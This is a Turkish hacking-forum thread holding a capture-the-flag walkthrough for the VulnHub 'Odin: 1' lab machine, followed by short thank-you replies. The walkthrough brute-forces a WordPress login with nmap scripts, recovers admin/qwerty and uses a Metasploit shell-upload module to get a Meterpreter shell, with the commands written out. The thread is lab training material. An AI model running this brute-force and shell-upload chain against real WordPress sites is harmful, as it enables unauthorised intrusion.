THT DUYURU

 
 
Capture The Flag Vulnerable VM Walkthrough & Capture The Flag (CTF) Writeup Yazabileceğiniz Bölüm

Seçenekler

Odin: 1 Vulnerable Machine WriteUp

"PurpposoLes - ait Kullanıcı Resmi (Avatar)
Kıdemli Üye
Üyelik tarihi:
09/2016
Nereden:
/root/.purp/
Mesajlar:
3.467
Konular:
289
Teşekkür (Etti):
1112
Teşekkür (Aldı):
1438
Ticaret:
(0) %
11
1287
3 Gün önce
#1
Herkese selamlar, bu konuda Odin: 1 adlı zaafiyetli makineyi çözeceğiz.
İndirmek isteyenler için: https://www.vulnhub.com/entry/odin-1,619/

Başlamadan önce şu adımları izleyiniz;

Kod:
nano /etc/hosts
Kod:
odin.makinesinin.ip.adresi odin
ÖRNEK KOD;

192.168.238.151 odin

Her zamanki gibi ilk olarak netdiscover atıyoruz ve makinemizin ip adresini tespit ediyoruz.



/etc/hosts dosyasına ip adresini kayıt ettiğimiz için tarayıcı üzerinde http://odin yazarak ulaşabiliriz.

Ve bizi çok güzel bir manzara karşılıyor arkadaşlar, sitemiz WordPress (:




Ben bilgi toplamak için wpscan yerine nmap kullanmayı tercih ediyorum /usr/share/nmap/scripts dizini altında bizim işimizi görecek olan .nse dosyalarını işaretledim.



Fotoğraftada görüldüğü üzere kısa bir nmap kodu çalıştırıyoruz ve bize brute-force saldırısı yaparak oturum açtığı bilgisini veriyor (:

http-wordpress* komutu 3 .nse dosyasınında yüklenip çalıştırılmasına yarar.




SONUÇLAR;



Kod:
K.Adı: admin
Passwd: qwerty

İsteyen arkadaşlar bu bilgilere WPScan üzerinden şu şekilde ulaşabilirler;



Hemen m3tasploit-framework e geçip Shell kodu çalıştırmak için

Kod:
search wordpress shell upload
sorgusunu gerçekleştiriyorum ve bize şu exploitleri listeliyor.


Burada dikkatimi 3. sıradaki exploit çekti işaretlediğim üzere, use 3 yazarak seçiyorum ve options diyerek gerekli olan bilgileri sağlayacağım.




Benden kullanıcı adı, parola ve hedef siteyi girmemi istiyor sırası ile;

Kod:
set USERNAME admin
set PASSWORD qwerty
set RHOSTS http://odin
yazıp tekrar kontrol ediyorum ve çalıştırıyorum.



Meterpreter bağlantısı aldık (: Shell yazarak oturum açalım bakalım.




Bağlantım gerçekleşti ve komut çalıştırabiliyorum.

İyi günler, iyi forumlar..
---------------------
ι'м α вℓα¢к нαт

Telegram
Konu "PurpposoLes tarafından (3 Gün önce Saat 23:53 ) değiştirilmiştir.
The Serum - ait Kullanıcı Resmi (Avatar)
Anka Underground (Çaylak)
Üyelik tarihi:
01/2018
Nereden:
/etc/shadow
Mesajlar:
79
Konular:
15
Teşekkür (Etti):
17
Teşekkür (Aldı):
21
Ticaret:
(0) %
3 Gün önce
#2
Eline sağlık dostum.
---------------------
No System Is Safe
Twitter: @tserumtht
The Golge - ait Kullanıcı Resmi (Avatar)
Anka Underground (Çaylak)
Üyelik tarihi:
05/2019
Nereden:
Gölge Diyarı
Mesajlar:
52
Konular:
3
Teşekkür (Etti):
99
Teşekkür (Aldı):
31
Ticaret:
(0) %
3 Gün önce
#3
Eline sağlık dostum.
`TR0GRES - ait Kullanıcı Resmi (Avatar)
Anka Underground (Çaylak)
Üyelik tarihi:
03/2020
Nereden:
\U0001F606
Mesajlar:
394
Konular:
32
Teşekkür (Etti):
300
Teşekkür (Aldı):
256
Ticaret:
(0) %
3 Gün önce
#4
Eline Emeğine Sağlık _
---------------------
Mᥙstᥲfᥲ Kᥱmᥲᥣ ATATÜRK





xmajestar - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2021
Nereden:
tzdata-TR
Mesajlar:
174
Konular:
13
Teşekkür (Etti):
14
Teşekkür (Aldı):
28
Ticaret:
(0) %
3 Gün önce
#5
Eline Sağlık yıldızladım
--------------------- NO SYSTEM İS SAFE...!
MAJESTAR..!
Winston Bey - ait Kullanıcı Resmi (Avatar)
Katılımcı Üye
Üyelik tarihi:
02/2021
Mesajlar:
312
Konular:
9
Teşekkür (Etti):
18
Teşekkür (Aldı):
83
Ticaret:
(0) %
2 Gün önce
#6
eline emeğine sağlık
--------------------- Sıradan ama TÜRK !
By Neferian - ait Kullanıcı Resmi (Avatar)
Anka Red Team Junior
Üyelik tarihi:
07/2018
Mesajlar:
429
Konular:
23
Teşekkür (Etti):
8
Teşekkür (Aldı):
40
Ticaret:
(0) %
2 Gün önce
#7
Ellerine sağlık.
--------------------- Var mısın ki yok olmaktan korkuyorsun ?
Jaime Lannister - ait Kullanıcı Resmi (Avatar)
Stajyer Moderatör
Üyelik tarihi:
12/2020
Mesajlar:
892
Konular:
16
Teşekkür (Etti):
112
Teşekkür (Aldı):
222
Ticaret:
(0) %
2 Gün önce
#8
Eline Sağlık, faydalı bir konu olmuş.
---------------------
"Hear Me Roar!"
Ghost Killer - ait Kullanıcı Resmi (Avatar)
Anka Underground (Çaylak)
Üyelik tarihi:
01/2019
Nereden:
J İ T E M
Mesajlar:
4.268
Konular:
133
Teşekkür (Etti):
113
Teşekkür (Aldı):
2239
Ticaret:
(0) %
2 Gün önce
#9
eline sağlık dostum.
--------------------- Aşk güzeldir karşılığı varsa ama karşılıksız da sevilir karşımdaki vatansa...

#Ghost Killer#
Profesör - ait Kullanıcı Resmi (Avatar)
Haftanın Asistanı
Üyelik tarihi:
04/2020
Nereden:
-Türkistan-
Mesajlar:
3.668
Konular:
208
Teşekkür (Etti):
742
Teşekkür (Aldı):
2260
Ticaret:
(0) %
2 Gün önce
#10
Eline emeğine sağlık purp
---------------------
İletişim için
Twitter: PROFESOR_THT
E-posta: [email protected]
Telegram: thtprof


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler